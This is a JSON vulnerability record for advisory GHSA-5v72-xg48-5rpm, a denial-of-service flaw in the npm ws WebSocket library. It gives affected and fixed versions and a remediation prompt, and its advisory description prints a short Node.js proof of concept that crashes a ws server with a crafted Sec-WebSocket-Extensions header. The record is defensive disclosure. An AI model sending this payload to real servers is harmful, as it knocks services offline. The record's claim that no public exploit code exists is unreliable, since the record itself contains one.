{"answers":{"affected":"4 open source packages ship an affected version, including ws.","exploited":"There is no known exploitation of GHSA-5v72-xg48-5rpm in the wild and no public exploit code.","fix":"Upgrade ws to a fixed version for your release line: 1.1.5 or 3.3.1.","what":"GHSA-5v72-xg48-5rpm is a denial of service vulnerability in ws, published on 4 Jun 2019. An attacker can exploit it over the internet without logging in, with no action from the victim."},"fix_prompt":"Check this codebase for GHSA-5v72-xg48-5rpm and fix it if it is affected.\n\nWhat it is: GHSA-5v72-xg48-5rpm is a denial of service vulnerability in ws, published on 4 Jun 2019. An attacker can exploit it over the internet without logging in, with no action from the victim.\nExploitation: There is no known exploitation of GHSA-5v72-xg48-5rpm in the wild and no public exploit code.\n\nAffected packages and fixed versions:\n- ws (npm): affected from 0.6.0; fixed in 1.1.5\n- ws (npm): affected from 0.6.0; fixed in 1.1.5\n- ws (npm): affected from 2.0.0; fixed in 3.3.1\n- ws (npm): affected from 2.0.0; fixed in 3.3.1\n\nTask:\n1. Search the dependency manifests and lockfiles (for example package.json, package-lock.json, requirements.txt, poetry.lock, uv.lock, pom.xml, build.gradle, go.mod, Cargo.lock, Gemfile.lock) and any Dockerfiles for the affected packages, including transitive dependencies.\n2. If an affected version is in use, upgrade it to the fixed version for its release line with the project's package manager, so the lockfile is regenerated. Prefer the smallest upgrade that fixes it.\n3. If there is no fix, or the upgrade would break the build, do not guess: explain the risk and the safest workaround instead.\n4. Run the tests and summarise what changed and why.\n5. If nothing in the project is affected, say so and change nothing.\n\nReference: https://insights.sbomify.com/GHSA-5v72-xg48-5rpm/ (Markdown: https://insights.sbomify.com/GHSA-5v72-xg48-5rpm/index.md)","id":"GHSA-5v72-xg48-5rpm","markdown":"https://insights.sbomify.com/GHSA-5v72-xg48-5rpm/index.md","name":"GHSA-5v72-xg48-5rpm","record":{"aliases":[],"analysis":{"component_type":"library","fix_type":"upgrade","impacts":["denial_of_service"],"network_reachable":"yes","non_default_config":false,"product_category":"Node.js WebSocket library","requires_auth":"none","summary":"A remote attacker can crash the application by sending a specially crafted WebSocket extension header, requiring an upgrade to the ws library.","user_interaction":"not_required","vuln_class":"denial_of_service"},"analysis_generated_by":"qwen3.8-flash-next","assigner":null,"cpe":[],"cvss":{"score":null,"severity":null,"source":null,"vector":null,"version":null},"cwes":[],"description":"Affected versions of `ws` can crash when a specially crafted `Sec-WebSocket-Extensions` header containing `Object.prototype` property names as extension or parameter names is sent.\n\n## Proof of concept\n\n```\nconst WebSocket = require('ws');\nconst net = require('net');\n\nconst wss = new WebSocket.Server({ port: 3000 }, function () {\n  const payload = 'constructor';  // or ',;constructor'\n\n  const request = [\n    'GET / HTTP/1.1',\n    'Connection: Upgrade',\n    'Sec-WebSocket-Key: test',\n    'Sec-WebSocket-Version: 8',\n    `Sec-WebSocket-Extensions: ${payload}`,\n    'Upgrade: websocket',\n    '\\r\\n'\n  ].join('\\r\\n');\n\n  const socket = net.connect(3000, function () {\n    socket.resume();\n    socket.write(request);\n  });\n});\n```\n\n## Recommendation\n\nUpdate to version 3.3.1 or later.","ecosystems":["npm"],"exploits":{"exploitdb":null,"first_seen":null,"github_poc":null,"max_poc_stars":null,"metasploit":null,"nuclei":null,"refs":[],"tier":null},"has_fix":true,"headline":"Denial of Service in ws","id":"GHSA-5v72-xg48-5rpm","indexable":true,"kev":null,"kind":"advisory","links":{"ecosystem":"npm","product":null,"products":[],"type":"denial_of_service","year":"2019"},"n_packages":4,"n_references":null,"packages":[{"ecosystem":"npm","fixed":["1.1.5"],"introduced":["0.6.0"],"last_affected":[],"package":"ws","purl":null,"source":"GHSA-5v72-xg48-5rpm"},{"ecosystem":"npm","fixed":["1.1.5"],"introduced":["0.6.0"],"last_affected":[],"package":"ws","purl":"pkg:npm/ws","source":"GHSA-5v72-xg48-5rpm"},{"ecosystem":"npm","fixed":["3.3.1"],"introduced":["2.0.0"],"last_affected":[],"package":"ws","purl":null,"source":"GHSA-5v72-xg48-5rpm"},{"ecosystem":"npm","fixed":["3.3.1"],"introduced":["2.0.0"],"last_affected":[],"package":"ws","purl":"pkg:npm/ws","source":"GHSA-5v72-xg48-5rpm"}],"products":null,"published":"2019-06-04","related":[],"sources":[{"class":"attribution","licence":"CC BY 4.0","name":"GitHub Advisory Database","prefix":"GHSA"}],"ssvc":{"automatable":null,"exploitation":null,"technical_impact":null},"state":null,"updated":null,"vendors":null},"summary":"A remote attacker can crash the application by sending a specially crafted WebSocket extension header, requiring an upgrade to the ws library.","url":"https://insights.sbomify.com/GHSA-5v72-xg48-5rpm/"}